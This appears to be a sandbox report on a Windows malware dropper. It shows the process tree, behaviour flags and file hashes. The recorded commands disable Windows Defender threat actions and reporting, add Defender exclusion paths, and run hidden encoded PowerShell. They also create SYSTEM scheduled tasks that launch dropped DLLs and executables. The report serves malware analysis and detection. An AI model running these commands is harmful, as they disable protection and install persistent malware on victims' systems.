C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:3100
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1264
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2920
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:3604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3068
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HCxyEYsLPoBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VYxEjiIKDDwYC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WrbOaSOTQfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jNivjIkKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\BsYOAUalmtuIFlVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\SVXwGszHTIpIGNNH\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:323⤵PID:3564
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:324⤵PID:4424
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCxyEYsLPoBU2" /t REG_DWORD /d 0 /reg:643⤵PID:4660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:323⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VYxEjiIKDDwYC" /t REG_DWORD /d 0 /reg:643⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:323⤵PID:2012
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WrbOaSOTQfUn" /t REG_DWORD /d 0 /reg:643⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:323⤵PID:3696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jNivjIkKU" /t REG_DWORD /d 0 /reg:643⤵PID:1564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:323⤵PID:4992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR" /t REG_DWORD /d 0 /reg:643⤵PID:4956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:323⤵PID:4476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\BsYOAUalmtuIFlVB /t REG_DWORD /d 0 /reg:643⤵PID:5044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:323⤵PID:3740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx /t REG_DWORD /d 0 /reg:643⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:323⤵PID:3632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\SVXwGszHTIpIGNNH /t REG_DWORD /d 0 /reg:643⤵PID:2284
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpNCJFnGM" /SC once /ST 06:37:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpNCJFnGM"2⤵PID:3136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpNCJFnGM"2⤵PID:3412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GyQsokuHCPHrPIKjm" /SC once /ST 21:13:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe\" nk /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "GyQsokuHCPHrPIKjm"2⤵PID:5036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3580
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4580
-
C:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exeC:\Windows\Temp\SVXwGszHTIpIGNNH\OMwAQTJcvNhwFTD\kowDcWE.exe nk /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1448 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGKvUxYEKJhmpNiCsB"2⤵PID:1248
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:3816
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4884
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3564
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jNivjIkKU\micJLR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ydofTeYvCFRiBkl" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1784
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ydofTeYvCFRiBkl2" /F /xml "C:\Program Files (x86)\jNivjIkKU\taARNDf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4768
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ydofTeYvCFRiBkl"2⤵PID:4244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ydofTeYvCFRiBkl"2⤵PID:4916
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LBuWRqeXoiHTKS" /F /xml "C:\Program Files (x86)\HCxyEYsLPoBU2\oOIpNuc.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "oqzULkuhADdZu2" /F /xml "C:\ProgramData\BsYOAUalmtuIFlVB\hAeNVIS.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uNiyNhNrKWiTQIMhb2" /F /xml "C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\omkunSD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3208
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UeTWhQAkQYvpBfdsNev2" /F /xml "C:\Program Files (x86)\VYxEjiIKDDwYC\pvihkDq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4264
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BTdQtQCLlbasEjBtK" /SC once /ST 10:24:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BTdQtQCLlbasEjBtK"2⤵PID:4888
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3396
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2148
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:908
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:2332
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GyQsokuHCPHrPIKjm"2⤵PID:1752
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll",#1 /site_id 5254031⤵PID:2384
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\SVXwGszHTIpIGNNH\hwVSMBCg\qdrZWwf.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2516 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BTdQtQCLlbasEjBtK"3⤵PID:3480
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54f2ef0385c3d9cafae7fe7b1d9d12f24
SHA13c96709c1a6d1b59df361c2ddcf1fd6f1ed2f2ef
SHA2560c841b7895ca5029a29ba233c4f8612dc2730f33adfe5ae9acac168964841b72
SHA512ef3057c1eaae4507035d32a2df2088be42cb12141ee2afd1379a4723c00deb6a2cf4d5babc2cd365f6af01f96745dfe436e4476c44de3feef4f56ead43a275cc
-
Filesize
2KB
MD57c79517b2e1e58bb1c055133649d6310
SHA1c9067769c9834a1bf016391be54d5cc0e9cc0eef
SHA2567c31962b9fea32868770a52c89939db9025cee1b040df8cdf57e3cd5fa5c1ce9
SHA5120b705fb51b96085db1d71bd992903391b2eda2a25d6013feb590b88fbbb0091890906c8455bb5f57294c852da014145de87ce804e0740e080e39d31d0581b637
-
Filesize
2KB
MD51e309c3eb482f0ceaae89ca4e376d0f0
SHA1dd9bf8fa6b1c67f638ae9da735145d589b439548
SHA25683427040fb07b4f295bc78ed1226dec04ea41daacafdf2c11769b1b2fb16ccca
SHA512110ac5b50caf3d7f444825b354f2700faa89664cecbe57045f55df15b9af6ed77d0ecf8f58c7cf26e950b154ac90432a0100d4da49e4c2c7ad14bb3e5fbf11db
-
Filesize
2KB
MD571ac6331bb7a3b6fd87393780164950f
SHA14b01b34a066c944316b9a1a8c47775f8ddeb1e96
SHA25649f0279714c53d22df1e0fbe05059b59c28db00812f3e07379226b8667dfde6a
SHA5125db471f9b6ec0abd59081533731c99b4a1bf6299f7213e8d7ddbdd0ab1658f092292041de0c632c7ca9572882985d780e0e258d438fbbc38ebd91e2feeafa08e
-
Filesize
2KB
MD52b56407255de293280b56c21a74f3ff2
SHA10ec94e54d3651b9e8417a2e481ca32a361cf143a
SHA2565c6af67fa1141385723412d6cc49b17d3903c0945aa9a7f4c1462cb54ceda2c1
SHA512d85f3df6cf5bbdef0a787ae0e173918b0cc3968c3f449a38822176f7cb29055baafb6b44d4a7056bd49211ebe9d90676f4528ee6449393913c24c537adfc8914
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD57274a07d1b80de6f66290b47588cee3b
SHA1d926b384806c755fe6b9d03f68852765aabb5703
SHA2565eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8
SHA512b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3
-
Filesize
6.3MB
MD550f75202d7ee8fd884fe4a82fd6d5684
SHA1e88dcc4921d7f687d869a98b693ebfd2ce2f52fa
SHA256e35cbe3931cd60b96f1053136950b5e06fa130eddb502435f4cc8896ca2787f2
